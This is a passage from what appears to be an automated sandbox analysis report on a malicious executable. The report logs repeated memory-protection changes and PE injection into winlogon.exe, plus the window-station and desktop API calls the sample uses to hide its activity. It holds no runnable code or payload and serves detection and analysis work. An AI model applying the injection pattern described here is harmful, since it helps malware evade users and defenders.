Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D358000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D360000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D361000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D374000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D376000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D378000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D380000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D381000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D394000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D396000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D398000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D3F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D414000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D418000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D420000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D421000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D434000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D436000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D438000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D440000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D441000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D454000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D458000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D474000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D478000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D494000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D498000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D514000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D518000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D534000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D538000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D554000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D558000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D574000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D578000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D594000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D598000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)Show sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B6B3 OpenWindowStationA,SetProcessWindowStation,OpenDesktopA,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_0040B6B3
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D5A0000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 414000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 416000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: 418000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C941000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: C954000Jump to behavior
